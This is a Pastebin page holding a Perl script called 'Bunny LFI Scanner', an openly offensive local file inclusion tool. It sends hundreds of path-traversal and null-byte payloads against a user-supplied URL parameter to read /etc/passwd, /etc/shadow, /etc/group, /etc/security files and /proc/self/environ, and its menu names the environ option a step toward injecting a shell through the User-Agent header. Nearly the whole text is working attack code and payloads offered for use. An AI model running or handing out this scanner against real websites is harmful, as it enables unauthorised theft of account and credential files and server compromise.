API tools faq
paste
Advertisement
causevd

LFI SCANNER

causevd
Sep 8th, 2014
8,001
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.75 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/perl
  2. use HTTP::Request;
  3. use LWP::UserAgent;
  4. system ("cls");
  5. print "\n\tBunny LFI Scanner\n";
  6. print "\tby\n";
  7. print "\tm0le\n";
  8. print "\n\tBlack Tiger Security\n";
  9. print "\n";
  10. sleep (1);
  11. menu:;
  12. print "\tMenu:\n";
  13. print "\t[1]Passwd,Log";
  14. print "\t[Scan Files Of /etc/ Directory]\n";
  15. print "\t[2]Environ";
  16. print "\t\t[Scan Environ File For Inject Shell By U-Agent]\n";
  17. print"\n";
  18. print "\t\t Select Number To Start Scanner :";
  19. $menu = <>;
  20. if ($menu =~ /1/){
  21. goto lfi;
  22. }
  23. if ($menu =~ /2/){
  24. goto env;
  25. }
  26. else {
  27. print"\n\n";
  28. print "\t\tUnknow Command\n";
  29. goto menu;
  30. };
  31.  
  32.  
  33. lfi:;
  34. print "\n\n";
  35. print "\t\t\tWelcome To /etc/ Section With New Method\n\n";
  36. print "\t Insert Target (ex: http://www.site.com/index.php?page=)\n";
  37. print "\t Target :";
  38. $host=<STDIN>;
  39. chomp($host);
  40. if($host !~ /http:\/\//) { $host = "http://$host"; };
  41. @lfi = ('../etc/passwd',
  42. '../../etc/passwd',
  43. '../../../etc/passwd',
  44. '../../../../etc/passwd',
  45. '../../../../../etc/passwd',
  46. '../../../../../../etc/passwd',
  47. '../../../../../../../etc/passwd',
  48. '../../../../../../../../etc/passwd',
  49. '../../../../../../../../../etc/passwd',
  50. '../../../../../../../../../../etc/passwd',
  51. '../../../../../../../../../../../etc/passwd',
  52. '../../../../../../../../../../../../etc/passwd',
  53. '../../../../../../../../../../../../../etc/passwd',
  54. '../../../../../../../../../../../../../../etc/passwd',
  55. '../../../../../../../../../../../../../../../../etc/passwd',
  56. '....//etc/passwd',
  57. '....//....//etc/passwd',
  58. '....//....//....//etc/passwd',
  59. '....//....//....//....//etc/passwd',
  60. '....//....//....//....//....//etc/passwd',
  61. '....//....//....//....//....//....//etc/passwd',
  62. '....//....//....//....//....//....//....//etc/passwd',
  63. '....//....//....//....//....//....//....//....//etc/passwd',
  64. '....//....//....//....//....//....//....//....//....//etc/passwd',
  65. '....//....//....//....//....//....//....//....//....//....//etc/passwd',
  66. '../../etc/passwd%00',
  67. '../../../etc/passwd%00',
  68. '../../../../etc/passwd%00',
  69. '../../../../../etc/passwd%00',
  70. '../../../../../../etc/passwd%00',
  71. '../../../../../../../etc/passwd%00',
  72. '../../../../../../../../etc/passwd%00',
  73. '../../../../../../../../../etc/passwd%00',
  74. '../../../../../../../../../../etc/passwd%00',
  75. '../../../../../../../../../../../etc/passwd%00',
  76. '../../../../../../../../../../../../etc/passwd%00',
  77. '../../../../../../../../../../../../../etc/passwd%00',
  78. '../../../../../../../../../../../../../../etc/passwd%00',
  79. '../../../../../../../../../../../../../../../../etc/passwd%00',
  80. '....//etc/passwd%00',
  81. '....//....//etc/passwd%00',
  82. '....//....//....//etc/passwd%00',
  83. '....//....//....//....//etc/passwd%00',
  84. '....//....//....//....//....//etc/passwd%00',
  85. '....//....//....//....//....//....//etc/passwd%00',
  86. '....//....//....//....//....//....//....//etc/passwd%00',
  87. '....//....//....//....//....//....//....//....//etc/passwd%00',
  88. '....//....//....//....//....//....//....//....//....//etc/passwd%00',
  89. '....//....//....//....//....//....//....//....//....//....//etc/passwd%00',
  90. '../etc/shadow',
  91. '../../etc/shadow',
  92. '../../../etc/shadow',
  93. '../../../../etc/shadow',
  94. '../../../../../etc/shadow',
  95. '../../../../../../etc/shadow',
  96. '../../../../../../../etc/shadow',
  97. '../../../../../../../../etc/shadow',
  98. '../../../../../../../../../etc/shadow',
  99. '../../../../../../../../../../etc/shadow',
  100. '../../../../../../../../../../../etc/shadow',
  101. '../../../../../../../../../../../../etc/shadow',
  102. '../../../../../../../../../../../../../etc/shadow',
  103. '../../../../../../../../../../../../../../etc/shadow',
  104. '../etc/shadow%00',
  105. '../../etc/shadow%00',
  106. '../../../etc/shadow%00',
  107. '../../../../etc/shadow%00',
  108. '../../../../../etc/shadow%00',
  109. '../../../../../../etc/shadow%00',
  110. '../../../../../../../etc/shadow%00',
  111. '../../../../../../../../etc/shadow%00',
  112. '../../../../../../../../../etc/shadow%00',
  113. '../../../../../../../../../../etc/shadow%00',
  114. '../../../../../../../../../../../etc/shadow%00',
  115. '../../../../../../../../../../../../etc/shadow%00',
  116. '../../../../../../../../../../../../../etc/shadow%00',
  117. '../../../../../../../../../../../../../../etc/shadow%00',
  118. '../etc/group',
  119. '../../etc/group',
  120. '../../../etc/group',
  121. '../../../../etc/group',
  122. '../../../../../etc/group',
  123. '../../../../../../etc/group',
  124. '../../../../../../../etc/group',
  125. '../../../../../../../../etc/group',
  126. '../../../../../../../../../etc/group',
  127. '../../../../../../../../../../etc/group',
  128. '../../../../../../../../../../../etc/group',
  129. '../../../../../../../../../../../../etc/group',
  130. '../../../../../../../../../../../../../etc/group',
  131. '../../../../../../../../../../../../../../etc/group',
  132. '../etc/group%00',
  133. '../../etc/group%00',
  134. '../../../etc/group%00',
  135. '../../../../etc/group%00',
  136. '../../../../../etc/group%00',
  137. '../../../../../../etc/group%00',
  138. '../../../../../../../etc/group%00',
  139. '../../../../../../../../etc/group%00',
  140. '../../../../../../../../../etc/group%00',
  141. '../../../../../../../../../../etc/group%00',
  142. '../../../../../../../../../../../etc/group%00',
  143. '../../../../../../../../../../../../etc/group%00',
  144. '../../../../../../../../../../../../../etc/group%00',
  145. '../../../../../../../../../../../../../../etc/group%00',
  146. '../etc/security/group',
  147. '../../etc/security/group',
  148. '../../../etc/security/group',
  149. '../../../../etc/security/group',
  150. '../../../../../etc/security/group',
  151. '../../../../../../etc/security/group',
  152. '../../../../../../../etc/security/group',
  153. '../../../../../../../../etc/security/group',
  154. '../../../../../../../../../etc/security/group',
  155. '../../../../../../../../../../etc/security/group',
  156. '../../../../../../../../../../../etc/security/group',
  157. '../etc/security/group%00',
  158. '../../etc/security/group%00',
  159. '../../../etc/security/group%00',
  160. '../../../../etc/security/group%00',
  161. '../../../../../etc/security/group%00',
  162. '../../../../../../etc/security/group%00',
  163. '../../../../../../../etc/security/group%00',
  164. '../../../../../../../../etc/security/group%00',
  165. '../../../../../../../../../etc/security/group%00',
  166. '../../../../../../../../../../etc/security/group%00',
  167. '../../../../../../../../../../../etc/security/group%00',
  168. '../etc/security/passwd',
  169. '../../etc/security/passwd',
  170. '../../../etc/security/passwd',
  171. '../../../../etc/security/passwd',
  172. '../../../../../etc/security/passwd',
  173. '../../../../../../etc/security/passwd',
  174. '../../../../../../../etc/security/passwd',
  175. '../../../../../../../../etc/security/passwd',
  176. '../../../../../../../../../etc/security/passwd',
  177. '../../../../../../../../../../etc/security/passwd',
  178. '../../../../../../../../../../../etc/security/passwd',
  179. '../../../../../../../../../../../../etc/security/passwd',
  180. '../../../../../../../../../../../../../etc/security/passwd',
  181. '../../../../../../../../../../../../../../etc/security/passwd',
  182. '../etc/security/passwd%00',
  183. '../../etc/security/passwd%00',
  184. '../../../etc/security/passwd%00',
  185. '../../../../etc/security/passwd%00',
  186. '../../../../../etc/security/passwd%00',
  187. '../../../../../../etc/security/passwd%00',
  188. '../../../../../../../etc/security/passwd%00',
  189. '../../../../../../../../etc/security/passwd%00',
  190. '../../../../../../../../../etc/security/passwd%00',
  191. '../../../../../../../../../../etc/security/passwd%00',
  192. '../../../../../../../../../../../etc/security/passwd%00',
  193. '../../../../../../../../../../../../etc/security/passwd%00',
  194. '../../../../../../../../../../../../../etc/security/passwd%00',
  195. '../../../../../../../../../../../../../../etc/security/passwd%00',
  196. '../etc/security/user',
  197. '../../etc/security/user',
  198. '../../../etc/security/user',
  199. '../../../../etc/security/user',
  200. '../../../../../etc/security/user',
  201. '../../../../../../etc/security/user',
  202. '../../../../../../../etc/security/user',
  203. '../../../../../../../../etc/security/user',
  204. '../../../../../../../../../etc/security/user',
  205. '../../../../../../../../../../etc/security/user',
  206. '../../../../../../../../../../../etc/security/user',
  207. '../../../../../../../../../../../../etc/security/user',
  208. '../../../../../../../../../../../../../etc/security/user',
  209. '../etc/security/user%00',
  210. '../../etc/security/user%00',
  211. '../../../etc/security/user%00',
  212. '../../../../etc/security/user%00',
  213. '../../../../../etc/security/user%00',
  214. '../../../../../../etc/security/user%00',
  215. '../../../../../../../etc/security/user%00',
  216. '../../../../../../../../etc/security/user%00',
  217. '../../../../../../../../../etc/security/user%00',
  218. '../../../../../../../../../../etc/security/user%00',
  219. '../../../../../../../../../../../etc/security/user%00',
  220. '../../../../../../../../../../../../etc/security/user%00',
  221. '../../../../../../../../../../../../../etc/security/user%00');
  222.  
  223.  
  224. foreach $scan(@lfi){
  225.  
  226. $url = $host.$scan;
  227. $request = HTTP::Request->new(GET=>$url);
  228. $useragent = LWP::UserAgent->new();
  229.  
  230. $response = $useragent->request($request);
  231. if ($response->is_success && $response->content =~ /root:x:/) { $msg = Vulnerability;}
  232. else { $msg = "Not Found";}
  233. print "$scan..........[$msg]\n";
  234. }
  235. env:;
  236. print "\n\n";
  237. print "\t\t\tWelcom To Environ Section\n\n";
  238. print "\t Insert Target (ex: http://www.site.com/index.php?page=)\n";
  239. print "\t Target :";
  240. $host=<STDIN>;
  241. chomp($host);
  242. if($host !~ /http:\/\//) { $host = "http://$host"; };
  243.  
  244. print "\n\n";
  245. print "\t\t*-*-*-*-*-* WORKING IN PROGRESS *-*-*-*-*-*\n";
  246. print "\n\n";
  247.  
  248. @env = ('../proc/self/environ',
  249. '../../proc/self/environ',
  250. '../../../proc/self/environ',
  251. '../../../../proc/self/environ',
  252. '../../../../../proc/self/environ',
  253. '../../../../../../proc/self/environ',
  254. '../../../../../../../proc/self/environ',
  255. '../../../../../../../../proc/self/environ',
  256. '../../../../../../../../../proc/self/environ',
  257. '../../../../../../../../../../proc/self/environ',
  258. '../../../../../../../../../../../proc/self/environ',
  259. '../../../../../../../../../../../../proc/self/environ',
  260. '../../../../../../../../../../../../../proc/self/environ',
  261. '../../../../../../../../../../../../../../proc/self/environ',
  262. '../proc/self/environ%00',
  263. '../../proc/self/environ%00',
  264. '../../../proc/self/environ%00',
  265. '../../../../proc/self/environ%00',
  266. '../../../../../proc/self/environ%00',
  267. '../../../../../../proc/self/environ%00',
  268. '../../../../../../../proc/self/environ%00',
  269. '../../../../../../../../proc/self/environ%00',
  270. '../../../../../../../../../proc/self/environ%00',
  271. '../../../../../../../../../../proc/self/environ%00',
  272. '../../../../../../../../../../../proc/self/environ%00',
  273. '../../../../../../../../../../../../proc/self/environ%00',
  274. '../../../../../../../../../../../../../proc/self/environ%00',
  275. '../../../../../../../../../../../../../../proc/self/environ%00');
  276.  
  277. foreach $scan_env(@env){
  278.  
  279. $url = $host.$scan_env;
  280. $request = HTTP::Request->new(GET=>$url);
  281. $useragent = LWP::UserAgent->new();
  282.  
  283. $response = $useragent->request($request);
  284. if ($response->is_success && $response->content =~ /HTTP_ACCEPT/ && $response->content =~ /HTTP_HOST/) { $msg = Vulnerability;}
  285. else { $msg = "Not Found";}
  286. print "$scan_env..........[$msg]\n";
  287. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!